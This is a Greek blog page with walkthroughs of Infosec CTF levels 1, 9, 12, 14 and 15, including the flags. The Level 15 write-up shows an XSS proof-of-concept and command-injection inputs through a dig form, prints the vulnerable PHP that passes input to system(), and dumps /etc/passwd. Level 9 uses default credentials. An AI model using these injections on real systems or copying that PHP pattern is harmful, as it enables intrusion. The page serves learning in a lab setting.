Κυριακή 15 Μαρτίου 2015

Infosec CTF | Level 14

Infosec CTF

Level 15 : infosec_flagis_whatsorceryisthis


Αποτέλεσμα εικόνας για let's do this gif

Open the file.

By opening it we learn that it is an SQL dump . 
Lets search the word flag (we are looking for a flag , remember ?)

There is a table named flag !INTERESTING!
Lets analyze what information contains ...
There is an admins' account with an encrypted password. I tried to decrypt it but with no luck 
(it is a hash from wordpress by the way ...).

If you scroll down ,there is a table named "friends". A strange name appears there :
 \\u0069\\u006e\\u0066\\u006f\\u0073\\u0065\\u0063\\u005f\\u0066\\u006c\\u0061\\u0067\\u0069\\u0073\\u005f\\u0077\\u0068\\u0061\\u0074\\u0073\\u006f\\u0072\\u0063\\u0065\\u0072\\u0079\\u0069\\u0073\\u0074\\u0068\\u0069\\u0073

Really suspicious I can say . Lets try to decrypt it . Seems to be a unicode encryption but with an extra "/" . We do not have something to lose :)

Erase the extra "/" and the flag is yours ;)







Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:
Ετικέτες , , , ,

Infosec CTF | Level 12

Innfosec CTF

Level 12 : infosec_flagis_heyimnotacolor


Hint: Dig deeper!

Thats the same picture with the level 1 . So we have to dig deeper in the source code :)
[ctrl+u to view source code]

At first glance the source code has the same elements with all the previous levels. But there has to be a small difference . Lets compare the source code of level 1 with the source code of level 12!

A new line has been added in the source code . Lets check out the file :)

Thats an encoded hex string (696e666f7365635f666c616769735f686579696d6e6f7461636f6c6f72), decode it and the flag is yours ! 








Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:
Ετικέτες , , , ,

Infosec CTF | Level 9

Infosec CTF

Level 9 : ssaptluafed_sigalf_cesofni


As we can see this is a cisco ids panel . 
Tip : In every penetration test try to test for default credentials, many admins forget to change them.

So we will search for default credentials we the help of the google seach engine <-- the best hacking tool ! 


As you can see we do not even have to visit the page !
username:password
root:attack


And the flag pops up ...





Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:
Ετικέτες , , , ,

Σάββατο 14 Μαρτίου 2015

Infosec CTF | Level 15

Infosec CTF

Level 15 : infosec_flagis_rceatomized

Firstly Level 15 is vulnerable to xss :P
Type inside the box &echo "<script>alert('Xss')</script>"
Poc:


Now lets focus on our goal !
The issue with the app is that it is vulnerable to command injection .
Quick guide in command injection : The ampersand character (&) is used to batch multiple commands. In this level we use & character in order to escape from the dig command and execute our own commands simultaneously. 

 Lets run some commands in order to "map" the attack surface.

A good start for every attack is &whoami  command in order for  to see what is our privilege level . (many people may say run id/uid command , we can say that it is the same read more)
No root :/
Lets see the directory &pwd

Ok now we have something. Lets list the files inside the folder /levelfiften . Insert &find to list all the files and sub directories read this .
                  



Hmmmmm there is a file named .hey! Lets open the file with our browser.


Now we have to decrypt the hash Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC  :) . 

 Its was encrypted with Atom 128 See it for yourself Atom 128 Decode (The best site for decryption)

-----------------------------What i found while I was trying to solve the challenge----------------------------
Also the source of index.php script  is :

<?php
if(isset($_POST['dig'])){
echo "<pre>";
$cmd = ($_POST['dig']);
system("dig mx " . $cmd );
echo "</pre>";
die;
}
?>

../etc/passwd file
  
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
landscape:x:103:109::/var/lib/landscape:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false




All the installed services



Apache2





apt





byobu





cgi-bin





cloud-init





command-not-found





coreutils





dbus-1.0





dpkg





eject





gcc





girepository-1.0





gnupg





grub





grub-legacy





initramfs-tools





insserv





klibc





landscape





language-selector





libbind9.so.90





libbind9.so.90.0.9





libcwidget.so.3





libcwidget.so.3.0.0





libdns.so.100





libdns.so.100.2.2





libdumbnet.la





libdumbnet.so.1





libdumbnet.so.1.0.1





libeatmydata





libgirepository-1.0.so.1





libgirepository-1.0.so.1.0.0





libguestlib.a





libguestlib.so





libguestlib.so.0





libguestlib.so.0.0.0





libhgfs.a





libhgfs.so





libhgfs.so.0





libhgfs.so.0.0.0





libisc.so.95





libisc.so.95.5.0





libisccc.so.90





libisccc.so.90.0.6





libisccfg.so.90





libisccfg.so.90.1.0





liblwres.so.90





liblwres.so.90.0.7





libperl.so.5.18





libperl.so.5.18.2





libvmtools.a





libvmtools.so





libvmtools.so.0





libvmtools.so.0.0.0





libxapian.so.22





libxapian.so.22.6.3





linux-boot-probes





locale





man-db





mime





mysql





open-vm-tools





openssh





os-prober





os-probes





perl





perl5





php5





pkgconfig





pm-utils





policykit-1





pppd





pt_chown





python2.7





python3





python3.4





rsyslog





sasl2





sftp-server





software-properties





ssl





sudo





systemd





tar





tasksel





tc





tmpfiles.d





ubuntu-release-upgrader





update-notifier





upstart





valgrind





w3m





x86_64-linux-gnu

Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:
Ετικέτες , , , ,

Infosec CTF | Level 1

Infosec CTF 


Level 1 : infosec_flagis_welcome


Hint: May the source be with you !

It was pretty straight forward that we have to look at the source code.
[ctrl+u to view the source code]






Second way use CURL to view the source code :

In linux the curl is pre-installed at many distros but in windows you have to download curl (choose curl executable). When download will finish place  curl.exe to your Desktop and locate the file in cmd.

In linux:
Type in a terminal curl ctf.infosecinstitute.com | grep flag and you will see the flag .
More info about grep




Αναρτήθηκε από στις Δεν υπάρχουν σχόλια:
Ετικέτες , , ,
Εγγραφή σε: Σχόλια (Atom)